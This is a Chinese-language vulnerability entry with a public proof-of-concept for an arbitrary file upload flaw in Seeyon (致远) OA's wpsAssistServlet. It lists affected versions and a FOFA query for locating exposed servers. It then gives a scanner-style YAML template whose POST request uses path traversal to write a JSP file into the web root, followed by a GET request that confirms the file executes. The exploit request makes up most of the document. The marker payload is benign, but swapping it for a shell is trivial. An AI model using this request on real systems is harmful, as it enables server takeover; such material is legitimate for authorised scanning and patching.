漏洞描述
致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)
致远OA G6、G6N (V8.1、V8.1SP1)
app="致远互联-OA" && title="V8.0SP2"
seeyon-wps-assist-servlet-upload: 致远OA wpsAssistServlet 文件上传
PoC代码[已公开]
id: seeyon-wps-assist-servlet-upload
info:
name: 致远OA wpsAssistServlet 文件上传
author: 123456
severity: high
verified: true
description: |
致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)
致远OA G6、G6N (V8.1、V8.1SP1)
app="致远互联-OA" && title="V8.0SP2"
reference:
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20wpsAssistServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
set:
rfilename: randomLowercase(12)
r2: randomInt(40000, 44800)
r3: randomInt(40000, 44800)
md5str: md5(rfilename)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{rfilename}}.jsp&fileId=2
headers:
Content-Type: "multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}"
body: "--WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"upload\"; filename=\"123.xls\"\r\nContent-Type: application/vnd.ms-excel\r\n\r\n<% out.println(\"{{md5str}}\");%>\r\n--WebKitFormBoundary{{rboundary}}--\r\n\r\n"
expression: response.status == 200 && response.body.bcontains(b'"code":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"officeTransResultFlag":') && response.body.bcontains(b'true')
r1:
request:
method: GET
path: /{{rfilename}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(md5str))
expression: r0() && r1()